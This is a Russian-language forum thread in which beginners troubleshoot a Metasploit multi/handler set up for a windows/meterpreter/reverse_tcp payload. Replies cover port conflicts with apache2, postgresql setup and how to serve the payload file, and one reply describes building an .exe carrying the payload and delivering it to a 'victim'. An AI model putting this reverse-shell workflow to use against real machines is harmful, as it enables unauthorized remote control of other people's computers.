• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Проблема с Metasploit'ом

W

WHello

Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?
 

s unity

Green Team
18.09.2019
207
26
BIT
0
сессия запущена, но сам meterpreter не активен
фаервол не дает запуститься метерупретеру (на обновленных машинах не работает). это единственная причина, которую я могу выдвинуть по этому поводу. проблема очень актуальна, и никто не может дать внятный ответ. можешь попробовать запустить exploit -j и когда прилетит сессия попробовать ее открыть sessions -i 1 (кому то помогает, мне не помогло)
 

s unity

Green Team
18.09.2019
207
26
BIT
0
reverse TCP handler вроде бы запустился, а payload handler не стартует
что ты имеешь ввиду? reverse это реверсивное соединение (от точки Б к точке А), а TCP это протокол передачи данных.
handler - это можно считать названием утилиты, при запуске которой открывается указанный тобой порт (set LHOST 4444) и слушает его
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp - это значение, которое ты вписываешь, не сам пэйлоад, ты указываешь утилите handler какой payload прилетит на порт 4444 от жертвы.
другими словами ты сначала создаешь вирус .exe в котором сидит payload (windows/meterpreter/reverse_tcp) и доставляешь его жертве, когда он его запускает, payload начинает пытаться отправлять данные на указзанный тобой ипишник по порту 4444. тебе нужно словить все эти пакеты, но как это сделать? для это и есть handler (ловить пакеты и обрабатывать)

пожалуйста.
 

Сергей Попов

Кодебай
30.12.2015
4 716
6 690
BIT
586

s unity

Green Team
18.09.2019
207
26
BIT
0
мы внимательно наблюдаем за действиями участников
Интересненько... на мои записи тоже есть необоснованные дизлайки. Даже наоборот я подметил что однв программа из списка в статье не работает, а мне два диза влепили 😂
 

Сергей Попов

Кодебай
30.12.2015
4 716
6 690
BIT
586
Интересненько... на мои записи тоже есть необоснованные дизлайки. Даже наоборот я подметил что однв программа из списка в статье не работает, а мне два диза влепили 😂
Для решения подобных проблем есть кнопка
1574193024852.png

Жмете и описываете суть проблемы.
 
14.12.2019
1
0
BIT
0
Что делать?
Нет подключения при команде db_status
 

Вложения

  • Screenshot_2019-12-14-17-04-18-246_com.termux.png
    Screenshot_2019-12-14-17-04-18-246_com.termux.png
    72,1 КБ · Просмотры: 296
  • Screenshot_2019-12-14-16-56-15-749_com.termux.png
    Screenshot_2019-12-14-16-56-15-749_com.termux.png
    66 КБ · Просмотры: 232

lomini

Green Team
10.12.2019
50
5
BIT
13
вообще делается service postgresql start и потом msfconsole

Не забудь создать в самом постгресе базу и юзера с пассом который такой же как и у твоем database.yml , Некоторые почему то забывают это сделать .
И вообще для новичков , я думаю лучше узать Армитаж Гуи для меты , что бы было немного проще со всем этим делом разобраться.
 

Tafi

Member
30.07.2020
24
0
BIT
0
Здравствуйте, форумчане. Я новичок в metasploit'e, и возникновение в моем случае каких-либо ошибок неизбежно. Однако проявление следующей ошибки я не нашел ни у кого, и следовательно не могу ее решить.
Код:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 4444
msf exploit(multi/handler) > set LPORT 192.168.0.101
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.101

Меня лично уже настораживает вторая строка. Ни в одном туториале я не видел, чтобы в круглых скобках было "multi/handler", а не "handler". Однако, проблема в том, что reverse TCP handler вроде бы запустился, а payload handler не стартует, а значит ни о каком сеансе meterpreter не может быть и речи. Использую Windows 10, в Kali 2.0 такая же проблема. Версия metasploit 4.16.37. В чем проблема, как ее решить?
Подскажите, что я делаю не правильно .
Создаётся странный сервер . Там нет возможности скачать файл.
 

Вложения

  • Screenshot (7).png
    Screenshot (7).png
    96,6 КБ · Просмотры: 150
  • 5u6tiP4drqk.jpg
    5u6tiP4drqk.jpg
    208 КБ · Просмотры: 164
  • WEo7HBCUx38.jpg
    WEo7HBCUx38.jpg
    182,6 КБ · Просмотры: 159

BearSec

Platinum
20.04.2020
210
290
BIT
25
Подскажите, что я делаю не правильно .
Создаётся странный сервер . Там нет возможности скачать файл.
Судя по скриншотам, у тебя нормально запущен apache2.
В /var/www/html/ у тебя есть index.html, по этому когда ты вводишь ip адрес сервера в браузере, у тебя автоматом грузится index.html.
Можешь его переименовать или удалить и тогда у тебя покажется список файлов (со стандартными настройками apache2 спокойной отдает список файлов)

Multi/handler у тебя не запускается на порту 443 как раз из-за того, что apache2 занимает этот порт. Укажи другой свободный порт, либо выключай apache2, либо поменяй стандартные порты используемые apache2 в /etc/apache2/...
И когда генерировал пейлоад, ты тоже указал порт 443 учитывай это. (либо переделай пейлоад под другой порт, либо после скачивания файла с веб сервера не забудь погасить службу)

Ну и лучше создай для своей проблемы отдельную тему, будет удобнее
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!